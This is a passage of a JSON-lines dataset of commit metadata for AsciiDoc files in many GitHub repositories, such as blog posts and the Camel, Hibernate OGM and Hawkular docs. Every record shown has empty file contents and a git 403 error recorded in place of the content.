dangat\/elasticsearch,fernandozhu\/elasticsearch,wuranbo\/elasticsearch","old_file":"docs\/community-clients\/index.asciidoc","new_file":"docs\/community-clients\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d9ab73d218b25d730cb6020b61f058c26d87a65a","subject":"Publish 2017-02-25adoc.adoc","message":"Publish 2017-02-25adoc.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adoc.adoc","new_file":"2017-02-25adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1086ab446450cbc682ed42d6498c2e9ad26c99a","subject":"Update 2015-09-18-Better-Javascript-with-Setters-and-Getters.adoc","message":"Update 2015-09-18-Better-Javascript-with-Setters-and-Getters.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-09-18-Better-Javascript-with-Setters-and-Getters.adoc","new_file":"_posts\/2015-09-18-Better-Javascript-with-Setters-and-Getters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3ef0b13f378cc24385f925e4440870a6aafefdc","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 
2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21dac99c1ee129e075b8ac91c885f4413af4d29e","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcab44eab9ca0f8dff2f0d3906f3852fcbc264af","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48dde5848878495f5e259eb1598096b05493b795","subject":"Update 2020-04-05-reveal.adoc","message":"Update 2020-04-05-reveal.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-04-05-reveal.adoc","new_file":"_posts\/2020-04-05-reveal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2cfbe5f64ff4e219c72f62a3f7c327e222e694b","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"290afa3d6173fabb4d98d9f11508d3e169b47177","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0aa82e5bf8808f29866a376defb5477f1d5d7350","subject":"Doesn't work where no datatypes associated","message":"Doesn't work where no datatypes associated\n\n#CTCTOWALTZ-1950\n#5085\n","repos":"khartec\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,khartec\/waltz,kamransaleem\/waltz,khartec\/waltz,davidwatkins73\/waltz-dev,kamransaleem\/waltz,kamransaleem\/waltz,khartec\/waltz","old_file":"docs\/design\/draft\/attestation_permissions\/attestation_permissions.adoc","new_file":"docs\/design\/draft\/attestation_permissions\/attestation_permissions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c95fa27168f7233609acc71d05d6ee94e7d236c3","subject":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","message":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc2165a9e3801737e0a88258c1f0b33e11020af6","subject":"Added SetProperty EIP docs","message":"Added SetProperty EIP docs\n","repos":"nicolaferraro\/camel,sverkera\/camel,sverkera\/camel,DariusX\/camel,CodeSmell\/camel,curso007\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,apache\/camel,anoordover\/camel,pmoerenhout\/camel,tadayosi\/camel,snurmine\/camel,cunningt\/camel,apache\/camel,nikhilvibhav\/camel,akhettar\/camel,jonmcewen\/camel,jamesnetherton\/camel,adessaigne\/camel,curso007\/camel,alvinkwekel\/camel,sverkera\/camel,tadayosi\/camel,gnodet\/camel,sverkera\/camel,nicolaferraro\/camel,davidkarlsen\/camel,christophd\/camel,ullgren\/camel,ullgren\/camel,adessaigne\/camel,kevinearls\/camel,christophd\/camel,adessaigne\/camel,anoordover\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,snurmine\/camel,dmvolod\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,tadayosi\/camel,mcollovati\/camel,CodeSmell\/camel,apache\/camel,curso007\/camel,gautric\/camel,christophd\/camel,alvinkwekel\/camel,gautric\/camel,jonmcewen\/camel,pmoerenhout\/camel,onders86\/camel,tdiesler\/camel,DariusX\/camel,Fabryprog\/camel,cunningt\/camel,cunningt\/camel,cunningt\/camel,mcollovati\/camel,zregvart\/camel,tdiesler\/camel,nicolaferraro\/camel,pax95\/camel,pmoerenhout\/camel,curso007\/camel,apache\/camel,jonmcewen\/camel,onders86\/camel,pax95\/camel,apache\/camel,tdiesler\/camel,gautric\/camel,pax95\/camel,davidkarlsen\/camel,dmvolod\/camel,kevinearls\/camel,davidkarlsen\/camel,kevinearls\/camel,gautric\/camel,christophd\/camel,akhettar\/camel,zregvart\/camel,gnodet\/camel,zregvart\/camel,Fabryprog\/camel,jamesnetherton\/camel,gautric\/camel,anoordover\/camel,cunningt\/camel,onders86\/camel,adessaigne\/camel,sverkera\/camel,nikhilvibhav\/camel,tdiesler\/camel,mcollovati\/camel,anoordover\/camel,gnodet\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,pax95\/camel,ullgren\/camel,Darius
X\/camel,anoordover\/camel,pmoerenhout\/camel,Fabryprog\/camel,akhettar\/camel,DariusX\/camel,christophd\/camel,mcollovati\/camel,pmoerenhout\/camel,ullgren\/camel,tadayosi\/camel,gautric\/camel,kevinearls\/camel,objectiser\/camel,dmvolod\/camel,jamesnetherton\/camel,snurmine\/camel,onders86\/camel,akhettar\/camel,gnodet\/camel,snurmine\/camel,punkhorn\/camel-upstream,gnodet\/camel,alvinkwekel\/camel,curso007\/camel,objectiser\/camel,jonmcewen\/camel,snurmine\/camel,akhettar\/camel,anoordover\/camel,dmvolod\/camel,tdiesler\/camel,jonmcewen\/camel,adessaigne\/camel,pmoerenhout\/camel,onders86\/camel,CodeSmell\/camel,snurmine\/camel,Fabryprog\/camel,objectiser\/camel,cunningt\/camel,onders86\/camel,dmvolod\/camel,zregvart\/camel,davidkarlsen\/camel,kevinearls\/camel,jamesnetherton\/camel,tadayosi\/camel,CodeSmell\/camel,sverkera\/camel,objectiser\/camel,kevinearls\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,apache\/camel,nikhilvibhav\/camel,akhettar\/camel,curso007\/camel,tdiesler\/camel,dmvolod\/camel,pax95\/camel,pax95\/camel,jamesnetherton\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/setProperty-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/setProperty-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59394afda09c03b5abd89e2e6cefb9fb76afcb56","subject":"y2b create post Deal Therapy: Amazing Headphones Deal, Sharp 40-inch LED TV Under $400 \\u0026 MORE!","message":"y2b create post Deal Therapy: Amazing Headphones Deal, Sharp 40-inch LED TV Under $400 \\u0026 MORE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-01-Deal-Therapy-Amazing-Headphones-Deal-Sharp-40inch-LED-TV-Under-400-u0026-MORE.adoc","new_file":"_posts\/2013-03-01-Deal-Therapy-Amazing-Headphones-Deal-Sharp-40inch-LED-TV-Under-400-u0026-MORE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"401cda92506236f5e723a364920f6f5cc232553e","subject":"Add documentation of schedule exceptions","message":"Add documentation of schedule exceptions\n","repos":"cvut\/sirius,cvut\/sirius","old_file":"docs\/schedule-exceptions.adoc","new_file":"docs\/schedule-exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cvut\/sirius.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37a57334107a1349ef0de80b2a9ab93400dd82a7","subject":"CL: Using ql:*local-project-directories* to load Quicklisp project from a specific location","message":"CL: Using ql:*local-project-directories* to load Quicklisp project from\na specific location\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"85a2babb0a88e9131dbd7b2e030c2a65e4fbf665","subject":"Update 
2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a12c59a8ec55c4e762aa8c68cf734f82f1f503","subject":"y2b create post When You See It...","message":"y2b create post When You See It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-04-When-You-See-It.adoc","new_file":"_posts\/2017-07-04-When-You-See-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc286268cbb0a0683bf7ab6276c5a7b5459d6ec3","subject":"add a redme","message":"add a redme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-karma-repository\/README.adoc","new_file":"plugins\/boteco-plugin-karma-repository\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e931fa5d7cdd3924468d70d5c2f76da223fd70f5","subject":"Update 2017-03-25-Get-started-with-Merlin-speech-synthesis-toolkit.adoc","message":"Update 2017-03-25-Get-started-with-Merlin-speech-synthesis-toolkit.adoc","repos":"ronanki\/ronanki.github.io,ronanki\/ronanki.github.io,ronanki\/ronanki.github.io,ronanki\/ronanki.github.io","old_file":"_posts\/2017-03-25-Get-started-with-Merlin-speech-synthesis-toolkit.adoc","new_file":"_posts\/2017-03-25-Get-started-with-Merlin-speech-synthesis-toolkit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ronanki\/ronanki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd0a8f0690f7eae2b630ed93fccffbed6b8cadf5","subject":"y2b create post Casio G-Shock GB-6900 Bluetooth Smart Watch CES 2012","message":"y2b create post Casio G-Shock GB-6900 Bluetooth Smart Watch CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-22-Casio-GShock-GB6900-Bluetooth-Smart-Watch-CES-2012.adoc","new_file":"_posts\/2012-01-22-Casio-GShock-GB6900-Bluetooth-Smart-Watch-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaa867f471ecc961a4bda043b830145a9130479e","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 
2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40c79d4892b778f66f14dbaae8dd6a6fe3e02109","subject":"Update 2016-04-03-Cache-in-Gitlab-C-I.adoc","message":"Update 2016-04-03-Cache-in-Gitlab-C-I.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2016-04-03-Cache-in-Gitlab-C-I.adoc","new_file":"_posts\/2016-04-03-Cache-in-Gitlab-C-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce6b130d268adaa5aa116a462aacf17e080c22f5","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d3de9475d4fcc9af037fe5297e1b06c2fce0621","subject":"Update 2016-08-19-laravel-with-pusher.adoc","message":"Update 2016-08-19-laravel-with-pusher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28b1e63e06dbc2f635d2d7388d0bfb429e4fa3df","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f84a4461bab2a7485d24abcef726df4e377dc8cb","subject":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","message":"Update 
2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","new_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38366e1ddf3df5650bb1ad8de99cda11061f2d74","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93b160d77e380fdad7941efabad0f3a7373bbb69","subject":"Update 2016-11-09-Eating-Vegan-at-a-Conference.adoc","message":"Update 2016-11-09-Eating-Vegan-at-a-Conference.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-11-09-Eating-Vegan-at-a-Conference.adoc","new_file":"_posts\/2016-11-09-Eating-Vegan-at-a-Conference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ec6181b9f1ccbe3751506ded94b1e2ca5642d2b","subject":"y2b create post The Levitating Light","message":"y2b create post The Levitating Light","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-13-The-Levitating-Light.adoc","new_file":"_posts\/2016-05-13-The-Levitating-Light.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bea7d30231008f671731f7b220e83866c7b25d04","subject":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","message":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e68f9779a0d2241d32dce1f769d878379ea800a4","subject":"Update 2018-10-17-Develop-New-UI-Setup.adoc","message":"Update 
2018-10-17-Develop-New-UI-Setup.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-10-17-Develop-New-UI-Setup.adoc","new_file":"_posts\/2018-10-17-Develop-New-UI-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e54afffe81c7920c02a0ef16fda99453fbe1001b","subject":"Update 2019-01-31-My-Alt-English-Title.adoc","message":"Update 2019-01-31-My-Alt-English-Title.adoc","repos":"ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress","old_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ml4den\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d237488c508dcaa04fac1da189522d74c5544c4b","subject":"Renamed '_posts\/2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc' to '_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","message":"Renamed '_posts\/2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc' to '_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_file":"_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eff7c0b02b1aaee2210c14692e645d8bd98bfbc","subject":"y2b create post 3 Unique Gadgets You Can Buy Right Now","message":"y2b create post 3 Unique Gadgets You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-08-3%20Unique%20Gadgets%20You%20Can%20Buy%20Right%20Now.adoc","new_file":"_posts\/2018-02-08-3%20Unique%20Gadgets%20You%20Can%20Buy%20Right%20Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f8eab824b62eeca296f59b3fc2263d3a1ea0893","subject":"OGM-761 Describing HSEARCH as optional","message":"OGM-761 Describing HSEARCH as 
optional\n","repos":"uugaa\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,schernolyas\/hibernate-ogm,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,schernolyas\/hibernate-ogm,jhalliday\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,uugaa\/hibernate-ogm,hibernate\/hibernate-ogm,jhalliday\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,uugaa\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,tempbottle\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,hibernate\/hibernate-ogm,jhalliday\/hibernate-ogm,tempbottle\/hibernate-ogm,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm,tempbottle\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/configuration.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/configuration.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"95ebc594bae24de7b6300d4055336c8c7b91d168","subject":"Add metrics 040 announcement","message":"Add metrics 040 announcement\n","repos":"lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/06\/23\/hawkular-metrics-0-4-0-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/06\/23\/hawkular-metrics-0-4-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 